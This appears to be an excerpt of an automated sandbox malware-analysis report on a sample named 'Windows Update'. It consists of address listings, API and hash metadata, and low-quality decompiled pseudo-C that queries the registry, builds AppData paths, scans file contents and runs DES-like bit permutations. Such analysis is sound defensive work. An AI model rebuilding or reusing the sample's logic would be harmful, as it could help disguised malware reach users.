                                                                                                                    0x000fdfc7
                                                                                                                    0x0009fef1
                                                                                                                    0x0009fef1
                                                                                                                    0x0009fef6
                                                                                                                    0x0009fefc
                                                                                                                    0x0009ff01
                                                                                                                    0x0009ff06
                                                                                                                    0x0009ff0b
                                                                                                                    0x0009ff11
                                                                                                                    0x0009ff16
                                                                                                                    0x0009ff26
                                                                                                                    0x0009ff26
                                                                                                                    0x0009feef
                                                                                                                    0x0009fe16
                                                                                                                    0x0009fe12
                                                                                                                    0x0009fc85
                                                                                                                    0x0009fc85
                                                                                                                    0x0009fc8b
                                                                                                                    0x0009fc93
                                                                                                                    0x0009fc9c
                                                                                                                    0x0009fc9c
                                                                                                                    0x0009fc9e
                                                                                                                    0x0009fc9f
                                                                                                                    0x0009fc9f
                                                                                                                    0x0009fca3
                                                                                                                    0x0009fca5
                                                                                                                    0x0009fcb4
                                                                                                                    0x0009fcb9
                                                                                                                    0x0009fcbc
                                                                                                                    0x0009fcbe
                                                                                                                    0x0009fcc0
                                                                                                                    0x0009fcc2
                                                                                                                    0x0009fccb
                                                                                                                    0x0009fcd2
                                                                                                                    0x0009fcd4
                                                                                                                    0x00000000
                                                                                                                    0x0009fcd4
                                                                                                                    0x0009fcc4
                                                                                                                    0x0009fcc4
                                                                                                                    0x0009fcd9
                                                                                                                    0x0009fcdf
                                                                                                                    0x0009fce4
                                                                                                                    0x0009fce5
                                                                                                                    0x0009fcea
                                                                                                                    0x0009fcea
                                                                                                                    0x0009fcc2
                                                                                                                    0x0009fcfe
                                                                                                                    0x0009fd03
                                                                                                                    0x0009fd08
                                                                                                                    0x0009fd0b
                                                                                                                    0x0009fd0d
                                                                                                                    0x0009fd39
                                                                                                                    0x0009fd3a
                                                                                                                    0x0009fd3f
                                                                                                                    0x0009fd40
                                                                                                                    0x0009fd4b
                                                                                                                    0x0009fd4c
                                                                                                                    0x0009fd51
                                                                                                                    0x0009fd57
                                                                                                                    0x0009fd6e
                                                                                                                    0x0009fd73
                                                                                                                    0x0009fd79
                                                                                                                    0x0009fd7e
                                                                                                                    0x0009fd83
                                                                                                                    0x0009fd0f
                                                                                                                    0x0009fd15
                                                                                                                    0x0009fd1c
                                                                                                                    0x0009fd23
                                                                                                                    0x0009fd24
                                                                                                                    0x0009fd29
                                                                                                                    0x0009fd2e
                                                                                                                    0x0009fd2e
                                                                                                                    0x0009fd0d
                                                                                                                    0x00000000
                                                                                                                    0x0009fca5
                                                                                                                    0x0009fbc9
                                                                                                                    0x0009fbcf
                                                                                                                    0x0009fbd0
                                                                                                                    0x0009fbd6
                                                                                                                    0x0009fbd9
                                                                                                                    0x00000000
                                                                                                                    0x0009fbdf
                                                                                                                    0x0009fbdf
                                                                                                                    0x00000000
                                                                                                                    0x0009fbdf
                                                                                                                    0x0009fbd9
                                                                                                                    0x00000000
                                                                                                                    0x0009fbc7
                                                                                                                    0x00000000
                                                                                                                    0x0009fb8c
                                                                                                                    0x0009f98d
                                                                                                                    0x0009f98d
                                                                                                                    0x0009fd8b
                                                                                                                    0x0009fd91
                                                                                                                    0x0009fd99
                                                                                                                    0x0009fd9b
                                                                                                                    0x0009fdae
                                                                                                                    0x0009fdae
                                                                                                                    0x00000000
                                                                                                                    0x0009fd9d
                                                                                                                    0x0009fd9d
                                                                                                                    0x00000000
                                                                                                                    0x0009fd9d
                                                                                                                    0x0009fd9b
                                                                                                                    0x00000000
                                                                                                                    0x0009f98b
                                                                                                                    0x0009fda8
                                                                                                                    0x00000000
                                                                                                                    0x0009fda8
                                                                                                                    0x0009f922
                                                                                                                    0x0009f922
                                                                                                                    0x0009f928
                                                                                                                    0x0009fdb4
                                                                                                                    0x0009fdb5
                                                                                                                    0x0009fdbc
                                                                                                                    0x0009fdc5
                                                                                                                    0x0009fdc6
                                                                                                                    0x0009fdc7
                                                                                                                    0x0009fdce
                                                                                                                    0x0009fdd7
                                                                                                                    0x0009fdd7
                                                                                                                    0x0009f8ee
                                                                                                                    0x0009f8ee
                                                                                                                    0x0009f8f5
                                                                                                                    0x0009f8fb
                                                                                                                    0x0009f8fc
                                                                                                                    0x0009f8ff
                                                                                                                    0x0009f903
                                                                                                                    0x0009f90d
                                                                                                                    0x0009f90d
                                                                                                                    0x0009f8ec
                                                                                                                    0x0009f89f
                                                                                                                    0x0009f89f
                                                                                                                    0x0009f89f
                                                                                                                    0x0009f8a5
                                                                                                                    0x0009f8a6
                                                                                                                    0x0009f8a9
                                                                                                                    0x0009f8b7
                                                                                                                    0x0009f8b7
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __time64.LIBCMT ref: 0009F81E
                                                                                                                      • Part of subcall function 000FE576: __aulldiv.LIBCMT ref: 000FE59F
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0009F83B
                                                                                                                    • swprintf.LIBCMT ref: 0009F866
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__aulldiv__ehfuncinfo$??2@__time64swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2341571929-0
                                                                                                                    • Opcode ID: 1cf5c7f097ef786546cedc61fcf3e4b6d765a993d0b43515fa1520263735f9a8
                                                                                                                    • Instruction ID: 658dbb3e5e26211a8531c00c8ce28d29b17f7707c7e19fd2dd62bc55ffda34ea
                                                                                                                    • Opcode Fuzzy Hash: 1cf5c7f097ef786546cedc61fcf3e4b6d765a993d0b43515fa1520263735f9a8
                                                                                                                    • Instruction Fuzzy Hash: 10A1E971A402196BFB20EB64CC46FFE73ADAF44700F1401B6FA0CF6682EB759A449B55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000A50EC Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: swprintf$_memset_strncmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 476866030-0
                                                                                                                    • Opcode ID: 1f86d718a72ba12fe006702f791e238d8ef0dfa872efcae64ef84cbeea82898f
                                                                                                                    • Instruction ID: c5b23917f159d631f8bae1b8d80fae32ab397af2e6c76eabeb0e3988c59cb891
                                                                                                                    • Opcode Fuzzy Hash: 1f86d718a72ba12fe006702f791e238d8ef0dfa872efcae64ef84cbeea82898f
                                                                                                                    • Instruction Fuzzy Hash: 6D9131B694026CAADB20DA90CD45FEF77BCEF09745F5400D1BB08E6181D7B1AE848FA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0001F387 Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 26%
                                                                                                                    			E0001F387(void* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v136;
				char _v271;
				void _v272;
				char _v276;
				char _v532;
				char _v784;
				char _v788;
				char _v792;
				char _v796;
				char _v1052;
				char _v1136;
				signed short _v1152;
				char _v1160;
				intOrPtr _v1196;
				signed int _v1208;
				char _v1467;
				char _v1468;
				char _v1980;
				intOrPtr _v1988;
				intOrPtr _v2044;
				signed int _v2056;
				char _v2076;
				signed int _v2080;
				char _v2315;
				char _v2316;
				char _v2572;
				intOrPtr _v4132;
				intOrPtr _v4136;
				intOrPtr _v4140;
				signed int* _v4144;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t100;
				void* _t101;
				intOrPtr _t103;
				void* _t105;
				char* _t112;
				void* _t122;
				intOrPtr _t125;
				void* _t126;
				intOrPtr _t127;
				void* _t128;
				char* _t138;
				signed int _t141;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				signed int _t166;
				signed int _t168;
				char _t169;
				signed int _t174;
				signed int _t179;
				signed int _t184;
				signed int _t189;
				signed int _t201;
				signed int _t206;
				signed int _t211;
				signed int _t216;
				signed int _t219;
				intOrPtr* _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t227;
				signed int _t237;
				signed int _t241;
				intOrPtr _t243;
				signed int _t245;
				void* _t247;
				signed int _t253;
				void* _t261;
				void* _t266;
				void* _t269;
				void* _t272;
				void* _t273;
				void* _t276;
				intOrPtr* _t282;
				intOrPtr* _t283;
				void* _t284;
				intOrPtr* _t288;
				intOrPtr* _t290;
				intOrPtr* _t298;
				void* _t300;
				signed int _t304;
				signed int _t308;
				signed int _t310;
				intOrPtr* _t311;
				signed int _t312;
				intOrPtr* _t315;
				int _t317;
				intOrPtr* _t321;
				void* _t323;
				signed int _t324;
				void* _t325;
				void* _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				void* _t337;
				intOrPtr* _t338;
				void* _t339;
				void* _t340;
				intOrPtr* _t341;
				void* _t343;
				void* _t345;
				void* _t346;
				signed int* _t347;
				void* _t349;
				void* _t350;
				void* _t353;
				void* _t354;
				signed int _t355;
				void* _t356;
				void* _t358;
				void* _t360;
				void* _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				void* _t373;
				intOrPtr* _t374;
				void* _t376;
				void* _t378;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t383;
				void* _t385;
				signed int _t386;
				void* _t390;
				void* _t391;
				void* _t392;
				void* _t393;
				void* _t395;
				void* _t396;
				void* _t397;
				void* _t399;

				_v8 =  *0x481f80 ^ _t379;
				_t282 = _a8;
				_t341 =  *0x470104;
				_t100 =  *_t341(0xfffffff5, _t340, _t354, __ebx);
				_t101 =  *0x47004c(_t100,  &_v1160);
				_t355 = _v1152 & 0x0000ffff;
				if(_t101 == 0) {
					_t355 = 0xf;
				}
				E0001B947();
				_t103 = _a4;
				_t407 = _t103 - 1;
				if(_t103 != 1) {
					__eflags = _t103 - 2;
					if(_t103 == 2) {
						goto L18;
					} else {
						__eflags = _t103 - 3;
						if(_t103 == 3) {
							_t245 = E000780AD( *((intOrPtr*)(_t282 + 4)), 0x470f2c);
							__eflags = _t245;
							if(_t245 != 0) {
								E0001F0B7();
							} else {
								E00077AF9( &_v1136, 0x3e8,  *((intOrPtr*)(_t282 + 8)));
								_t321 =  &_v1136;
								_t323 = _t321 + 1;
								do {
									_t253 =  *_t321;
									_t321 = _t321 + 1;
									__eflags = _t253;
								} while (_t253 != 0);
								__eflags = _t321 - _t323 - 1;
								if(_t321 - _t323 >= 1) {
									E0001C857( &_v1136);
								} else {
									E0001F0B7();
									_push(0x470f30);
									L0001EE77();
								}
							}
							_t247 =  *_t341();
							 *0x470050(_t355 | 0x00000008);
							_t353 = _t247;
							_pop(_t378);
							__eflags = 0;
							_t284 = 0xfffffff5;
							return E000772F2(0, _t284, _v8 ^ _t379, _t323, _t353, _t378);
						} else {
							E0001F0B7();
							_push(0x470f00);
							L0001EE77();
							_t383 = _t383 + 4;
							goto L19;
						}
					}
				} else {
					E0001F2D7();
					_t261 =  *_t341(0xfffffff5);
					_t282 =  *0x470050;
					 *_t282(_t261, 0xa);
					E00079C53(_t282, _t341, _t355, _t407);
					E00079C53(_t282, _t341, _t355, _t407);
					E0001EAC7();
					_t266 =  *_t341(0xfffffff5, 0x470d68, 0x470d48, 0x470d40, 0x470d34, 0x470d28, 0x470d1c);
					 *_t282(_t266, 0xf);
					E00079C53(_t282, _t341, _t355, _t407);
					_t383 = _t383 + 0x20;
					_t269 =  *_t341(0xfffffff5, 0x470e64, 0x4703dc);
					 *_t282(_t269, 0xf);
					_t272 =  *0x4700ec(0x470e90,  &_v136, 0x80);
					_t408 = _t272;
					if(_t272 == 0) {
						_t276 =  *_t341(0xfffffff5);
						 *_t282(_t276, 0xc);
						_push(0x470e98);
						E00079C53(_t282, _t341, _t355, _t408);
						_push(0x470ee0);
						E00079C53(_t282, _t341, _t355, _t408);
						_t383 = _t383 + 8;
						L00079F16(_t282, _t355, _t408);
					}
					_t273 =  *_t341(0xfffffff5);
					_t355 = _t355 | 0x00000008;
					 *_t282(_t273, _t355);
					L00078F58(0);
					L18:
					E0001F0B7();
					L19:
					_t105 =  *_t341(0xfffffff5);
					_t356 = _t355 | 0x00000008;
					 *0x470050(_t105, _t356);
					L00078F58(0);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t379);
					_t380 = _t383;
					_v1208 =  *0x481f80 ^ _t380;
					_v1468 = 0;
					E00077C87( &_v1467, 0, 0x103);
					_t385 = _t383 - 0x314 + 0xc;
					_v1988 = 0x104;
					_t112 =  &_v1980;
					if(_v1196 != 0xf) {
						_push(0x470fa8);
					} else {
						_push(0x470f60);
					}
					_push(0x200);
					_push(_t112);
					E00077AF9();
					_t386 = _t385 + 0xc;
					_push( &_v788);
					_push(0x20019);
					_push(0);
					_push( &_v784);
					_push(0x80000002);
					if( *0x470028() != 0) {
						L45:
						__eflags = 0;
						return E000772F2(0, _t282, _v12 ^ _t380, _t323, _t341, _t356);
					} else {
						_t122 =  *0x470024(_v788, 0, 0,  &_v796,  &_v272,  &_v792);
						if(_t122 != 0 || _v792 <= _t122 || _v272 == _t122) {
							 *0x47002c(_v788);
							goto L45;
						} else {
							 *0x47002c(_v788, _t341, _t356);
							if(_v272 == 0x22) {
								_t315 =  &_v272;
								_t31 = _t315 + 1; // 0x23
								_t339 = _t31;
								do {
									_t243 =  *_t315;
									_t315 = _t315 + 1;
								} while (_t243 != 0);
								_t317 = _t315 - _t339 - 1;
								if(_t317 > 0) {
									_t356 =  &_v271;
									memcpy( &_v272, _t356, _t317);
									_t386 = _t386 + 0xc;
									_t341 = _t356 + _t317 + _t317;
								}
							}
							_t288 =  &_v272;
							_t35 = _t288 + 1; // 0x23
							_t324 = _t35;
							do {
								_t125 =  *_t288;
								_t288 = _t288 + 1;
							} while (_t125 != 0);
							_t36 = _t288 - _t324 - 1; // 0x22
							_t126 = _t36;
							if(_t126 <= 0) {
								L37:
								_t290 =  &_v272;
								_t40 = _t290 + 1; // 0x1
								_t325 = _t40;
								do {
									_t127 =  *_t290;
									_t290 = _t290 + 1;
								} while (_t127 != 0);
								_t41 = _t290 - _t325 + 1; // 0x2
								_t342 = _t41;
								_t128 = E00077BCE(_t282, _t41, _t41);
								_t357 = _t128;
								if(_t128 != 0) {
									E00077AF9(_t357, _t342,  &_v272);
								}
								_pop(_t343);
								_pop(_t358);
								return E000772F2(_t357, _t282, _v12 ^ _t380, _t325, _t343, _t358);
							} else {
								while( *((char*)(_t380 + _t126 - 0x108)) != 0x5c) {
									_t126 = _t126 - 1;
									if(_t126 > 0) {
										continue;
									} else {
										goto L37;
									}
									goto L80;
								}
								__eflags = _t126 - 0x104;
								if(_t126 >= 0x104) {
									L00077EEC();
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t380);
									_t381 = _t386;
									_v2056 =  *0x481f80 ^ _t381;
									_push(_t356);
									_push(_t341);
									_v2316 = 0;
									E00077C87( &_v2315, 0, 0x103);
									_t390 = _t386 - 0x814 + 0xc;
									_t344 = 0;
									_t359 = 0;
									__eflags = _v2044 - 0xf;
									_t138 =  &_v2572;
									if(_v2044 != 0xf) {
										_push(0x471000);
									} else {
										_push(0x470fec);
									}
									E00077AF9();
									_t391 = _t390 + 0xc;
									_t141 =  *0x470200(0, 0x1a, 0, 0,  &_v276, _t138, 0x100);
									__eflags = _t141;
									if(_t141 == 0) {
										E00077AF9( &_v1052, 0x208,  &_v276);
										E00077B4E( &_v1052, 0x208, 0x470790);
										E00077B4E( &_v1052, 0x208,  &_v532);
										E00077B4E( &_v1052, 0x208, 0x471010);
										_v2080 = _t359;
										_t154 = E0007928A( &_v2080,  &_v1052, 0x470890);
										_t392 = _t391 + 0x3c;
										__eflags = _t154;
										if(_t154 != 0) {
											goto L52;
										} else {
											_t157 = _v2080;
											__eflags = _t157;
											if(__eflags == 0) {
												goto L52;
											} else {
												_push(_t157);
												_push(0x400);
												_push( &_v2076);
												_t159 = E00079087(_t282, _t344, _t359, __eflags);
												_t393 = _t392 + 0xc;
												__eflags = _t159;
												if(__eflags == 0) {
													L77:
													_push(_v2080);
													E00079010(_t282, _t344, _t359, __eflags);
													_pop(_t346);
													__eflags = _v16 ^ _t381;
													_pop(_t361);
													return E000772F2(_t344, _t282, _v16 ^ _t381, _t324, _t346, _t361);
												} else {
													do {
														E00078317( &_v2076, 0x400);
														_t395 = _t393 + 8;
														__eflags = _t359;
														if(_t359 != 0) {
															_t166 = E00078487( &_v2076, 0x471030);
															_t396 = _t395 + 8;
															__eflags = _t166;
															if(__eflags != 0) {
																_t168 = E00078487( &_v2076, 0x471038);
																_t397 = _t396 + 8;
																__eflags = _t168;
																if(_t168 != 0) {
																	 *_t168 = 0x5c;
																}
																_t298 =  &_v2076;
																_t326 = _t298 + 1;
																do {
																	_t169 =  *_t298;
																	_t298 = _t298 + 1;
																	__eflags = _t169;
																} while (_t169 != 0);
																_t300 = _t298 - _t326 - 1;
																__eflags = _t300 - 0x400;
																if(_t300 >= 0x400) {
																	L00077EEC();
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	_push(_t381);
																	_push(_t359);
																	_push(_t344);
																	_t347 = _v4144;
																	_t362 = _t347[1];
																	_t327 =  *_t347;
																	_t174 = (_t362 >> 0x00000004 ^ _t327) & 0x0f0f0f0f;
																	_t328 = _t327 ^ _t174;
																	_t363 = _t362 ^ _t174 << 0x00000004;
																	_t179 = (_t328 >> 0x00000010 ^ _t363) & 0x0000ffff;
																	_t364 = _t363 ^ _t179;
																	_t329 = _t328 ^ _t179 << 0x00000010;
																	_t184 = (_t364 >> 0x00000002 ^ _t329) & 0x33333333;
																	_t330 = _t329 ^ _t184;
																	_t365 = _t364 ^ _t184 << 0x00000002;
																	_t189 = (_t330 >> 0x00000008 ^ _t365) & 0x00ff00ff;
																	_t366 = _t365 ^ _t189;
																	_t331 = _t330 ^ _t189 << 0x00000008;
																	_t304 = (_t366 >> 0x00000001 ^ _t331) & 0x55555555;
																	 *_t347 = _t304 ^ _t331;
																	_t347[1] = _t304 + _t304 ^ _t366;
																	L0001FFF7(_t347, _v4132, 0);
																	L0001FFF7(_t347, _v4136, 1);
																	L0001FFF7(_t347, _v4140, 0);
																	_t367 = _t347[1];
																	_t332 =  *_t347;
																	_t201 = (_t367 >> 0x00000001 ^ _t332) & 0x55555555;
																	_t333 = _t332 ^ _t201;
																	_t368 = _t367 ^ _t201 + _t201;
																	_t206 = (_t333 >> 0x00000008 ^ _t368) & 0x00ff00ff;
																	_t369 = _t368 ^ _t206;
																	_t334 = _t333 ^ _t206 << 0x00000008;
																	_t211 = (_t369 >> 0x00000002 ^ _t334) & 0x33333333;
																	_t335 = _t334 ^ _t211;
																	_t370 = _t369 ^ _t211 << 0x00000002;
																	_t216 = (_t335 >> 0x00000010 ^ _t370) & 0x0000ffff;
																	_t371 = _t370 ^ _t216;
																	_t336 = _t335 ^ _t216 << 0x00000010;
																	_t308 = (_t371 >> 0x00000004 ^ _t336) & 0x0f0f0f0f;
																	_t219 = _t308 ^ _t336;
																	_t310 = _t308 << 0x00000004 ^ _t371;
																	__eflags = _t310;
																	 *_t347 = _t219;
																	_t347[1] = _t310;
																	return _t219;
																} else {
																	_push(_t282);
																	 *((char*)(_t381 + _t300 - 0x810)) = _t169;
																	_t221 = E00078487( &_v2076, 0x47103c);
																	_t311 =  &_v276;
																	_t399 = _t397 + 8;
																	_t283 = _t221;
																	_t79 = _t311 + 1; // 0x1
																	_t337 = _t79;
																	do {
																		_t222 =  *_t311;
																		_t311 = _t311 + 1;
																		__eflags = _t222;
																	} while (_t222 != 0);
																	_t312 = _t311 - _t337;
																	__eflags = _t312;
																	_t338 =  &_v532;
																	_t373 = _t338 + 1;
																	do {
																		_t223 =  *_t338;
																		_t338 = _t338 + 1;
																		__eflags = _t223;
																	} while (_t223 != 0);
																	_t324 = _t338 - _t373;
																	__eflags = _t324;
																	_t374 = _t283;
																	_t82 = _t374 + 1; // 0x1
																	_t349 = _t82;
																	do {
																		_t224 =  *_t374;
																		_t374 = _t374 + 1;
																		__eflags = _t224;
																	} while (_t224 != 0);
																	_t83 = _t312 + 3; // 0x4
																	_t359 = _t374 - _t349 + _t83 + _t324;
																	_t227 = E00077BCE(_t283, _t349, _t374 - _t349 + _t83 + _t324);
																	_t344 = _t227;
																	_t393 = _t399 + 4;
																	__eflags = _t227;
																	if(__eflags != 0) {
																		E00077AF9(_t344, _t359,  &_v276);
																		E00077B4E(_t344, _t359, 0x470790);
																		E00077B4E(_t344, _t359,  &_v532);
																		E00077B4E(_t344, _t359, 0x470790);
																		_t86 = _t283 + 1; // 0x1
																		E00077B4E(_t344, _t359, _t86);
																		_t393 = _t393 + 0x3c;
																	}
																	_pop(_t282);
																	goto L77;
																}
															} else {
																goto L61;
															}
														} else {
															_t241 = E00078487( &_v2076, 0x471020);
															_t396 = _t395 + 8;
															__eflags = _t241;
															if(__eflags != 0) {
																_t359 = 1;
															}
															goto L61;
														}
														goto L80;
														L61:
														_push(_v2080);
														_push(0x400);
														_push( &_v2076);
														_t237 = E00079087(_t282, _t344, _t359, __eflags);
														_t393 = _t396 + 0xc;
														__eflags = _t237;
													} while (__eflags != 0);
													_push(_v2080);
													E00079010(_t282, _t344, _t359, __eflags);
													_pop(_t350);
													_pop(_t376);
													__eflags = _v16 ^ _t381;
													return E000772F2(_t344, _t282, _v16 ^ _t381, _t324, _t350, _t376);
												}
											}
										}
									} else {
										 *0x470124();
										L52:
										_pop(_t345);
										_pop(_t360);
										__eflags = _v16 ^ _t381;
										return E000772F2(0, _t282, _v16 ^ _t381, _t324, _t345, _t360);
									}
								} else {
									 *((char*)(_t380 + _t126 - 0x108)) = 0;
									goto L37;
								}
							}
						}
					}
				}
				L80:
			}






























































































































































                                                                                                                    0x0001f397
                                                                                                                    0x0001f39b
                                                                                                                    0x0001f3a0
                                                                                                                    0x0001f3a8
                                                                                                                    0x0001f3b2
                                                                                                                    0x0001f3b8
                                                                                                                    0x0001f3c1
                                                                                                                    0x0001f3c3
                                                                                                                    0x0001f3c3
                                                                                                                    0x0001f3c8
                                                                                                                    0x0001f3cd
                                                                                                                    0x0001f3d0
                                                                                                                    0x0001f3d3
                                                                                                                    0x0001f465
                                                                                                                    0x0001f468
                                                                                                                    0x00000000
                                                                                                                    0x0001f46e
                                                                                                                    0x0001f46e
                                                                                                                    0x0001f471
                                                                                                                    0x0001f492
                                                                                                                    0x0001f49a
                                                                                                                    0x0001f49c
                                                                                                                    0x0001f4f1
                                                                                                                    0x0001f49e
                                                                                                                    0x0001f4ad
                                                                                                                    0x0001f4b2
                                                                                                                    0x0001f4bb
                                                                                                                    0x0001f4be
                                                                                                                    0x0001f4be
                                                                                                                    0x0001f4c0
                                                                                                                    0x0001f4c1
                                                                                                                    0x0001f4c1
                                                                                                                    0x0001f4c7
                                                                                                                    0x0001f4ca
                                                                                                                    0x0001f4e7
                                                                                                                    0x0001f4cc
                                                                                                                    0x0001f4cc
                                                                                                                    0x0001f4d1
                                                                                                                    0x0001f4d6
                                                                                                                    0x0001f4db
                                                                                                                    0x0001f4ca
                                                                                                                    0x0001f4f8
                                                                                                                    0x0001f4ff
                                                                                                                    0x0001f508
                                                                                                                    0x0001f509
                                                                                                                    0x0001f50c
                                                                                                                    0x0001f50e
                                                                                                                    0x0001f517
                                                                                                                    0x0001f473
                                                                                                                    0x0001f473
                                                                                                                    0x0001f478
                                                                                                                    0x0001f47d
                                                                                                                    0x0001f482
                                                                                                                    0x00000000
                                                                                                                    0x0001f482
                                                                                                                    0x0001f471
                                                                                                                    0x0001f3d9
                                                                                                                    0x0001f3d9
                                                                                                                    0x0001f3e0
                                                                                                                    0x0001f3e2
                                                                                                                    0x0001f3eb
                                                                                                                    0x0001f406
                                                                                                                    0x0001f410
                                                                                                                    0x0001f418
                                                                                                                    0x0001f41f
                                                                                                                    0x0001f424
                                                                                                                    0x0001f430
                                                                                                                    0x0001f435
                                                                                                                    0x0001f43a
                                                                                                                    0x0001f43f
                                                                                                                    0x0001f452
                                                                                                                    0x0001f458
                                                                                                                    0x0001f45a
                                                                                                                    0x0001f51a
                                                                                                                    0x0001f51f
                                                                                                                    0x0001f521
                                                                                                                    0x0001f526
                                                                                                                    0x0001f52b
                                                                                                                    0x0001f530
                                                                                                                    0x0001f535
                                                                                                                    0x0001f538
                                                                                                                    0x0001f538
                                                                                                                    0x0001f53f
                                                                                                                    0x0001f541
                                                                                                                    0x0001f546
                                                                                                                    0x0001f54a
                                                                                                                    0x0001f54f
                                                                                                                    0x0001f54f
                                                                                                                    0x0001f554
                                                                                                                    0x0001f556
                                                                                                                    0x0001f558
                                                                                                                    0x0001f55d
                                                                                                                    0x0001f565
                                                                                                                    0x0001f56a
                                                                                                                    0x0001f56b
                                                                                                                    0x0001f56c
                                                                                                                    0x0001f56d
                                                                                                                    0x0001f56e
                                                                                                                    0x0001f56f
                                                                                                                    0x0001f570
                                                                                                                    0x0001f571
                                                                                                                    0x0001f572
                                                                                                                    0x0001f573
                                                                                                                    0x0001f574
                                                                                                                    0x0001f575
                                                                                                                    0x0001f576
                                                                                                                    0x0001f577
                                                                                                                    0x0001f578
                                                                                                                    0x0001f587
                                                                                                                    0x0001f598
                                                                                                                    0x0001f59f
                                                                                                                    0x0001f5a4
                                                                                                                    0x0001f5ab
                                                                                                                    0x0001f5b5
                                                                                                                    0x0001f5bb
                                                                                                                    0x0001f5c4
                                                                                                                    0x0001f5bd
                                                                                                                    0x0001f5bd
                                                                                                                    0x0001f5bd
                                                                                                                    0x0001f5c9
                                                                                                                    0x0001f5ce
                                                                                                                    0x0001f5cf
                                                                                                                    0x0001f5d4
                                                                                                                    0x0001f5dd
                                                                                                                    0x0001f5de
                                                                                                                    0x0001f5e3
                                                                                                                    0x0001f5eb
                                                                                                                    0x0001f5ec
                                                                                                                    0x0001f5f9
                                                                                                                    0x0001f712
                                                                                                                    0x0001f717
                                                                                                                    0x0001f721
                                                                                                                    0x0001f5ff
                                                                                                                    0x0001f61e
                                                                                                                    0x0001f626
                                                                                                                    0x0001f70c
                                                                                                                    0x00000000
                                                                                                                    0x0001f644
                                                                                                                    0x0001f64c
                                                                                                                    0x0001f659
                                                                                                                    0x0001f65b
                                                                                                                    0x0001f661
                                                                                                                    0x0001f661
                                                                                                                    0x0001f667
                                                                                                                    0x0001f667
                                                                                                                    0x0001f669
                                                                                                                    0x0001f66a
                                                                                                                    0x0001f670
                                                                                                                    0x0001f673
                                                                                                                    0x0001f675
                                                                                                                    0x0001f681
                                                                                                                    0x0001f681
                                                                                                                    0x0001f681
                                                                                                                    0x0001f681
                                                                                                                    0x0001f673
                                                                                                                    0x0001f683
                                                                                                                    0x0001f689
                                                                                                                    0x0001f689
                                                                                                                    0x0001f68c
                                                                                                                    0x0001f68c
                                                                                                                    0x0001f68e
                                                                                                                    0x0001f68f
                                                                                                                    0x0001f695
                                                                                                                    0x0001f695
                                                                                                                    0x0001f69a
                                                                                                                    0x0001f6ab
                                                                                                                    0x0001f6ab
                                                                                                                    0x0001f6b1
                                                                                                                    0x0001f6b1
                                                                                                                    0x0001f6b7
                                                                                                                    0x0001f6b7
                                                                                                                    0x0001f6b9
                                                                                                                    0x0001f6ba
                                                                                                                    0x0001f6c0
                                                                                                                    0x0001f6c0
                                                                                                                    0x0001f6c4
                                                                                                                    0x0001f6c9
                                                                                                                    0x0001f6d0
                                                                                                                    0x0001f6db
                                                                                                                    0x0001f6e0
                                                                                                                    0x0001f6e3
                                                                                                                    0x0001f6e6
                                                                                                                    0x0001f6f4
                                                                                                                    0x0001f69c
                                                                                                                    0x0001f69c
                                                                                                                    0x0001f6a6
                                                                                                                    0x0001f6a9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001f6a9
                                                                                                                    0x0001f6f5
                                                                                                                    0x0001f6fa
                                                                                                                    0x0001f722
                                                                                                                    0x0001f727
                                                                                                                    0x0001f728
                                                                                                                    0x0001f729
                                                                                                                    0x0001f72a
                                                                                                                    0x0001f72b
                                                                                                                    0x0001f72c
                                                                                                                    0x0001f72d
                                                                                                                    0x0001f72e
                                                                                                                    0x0001f72f
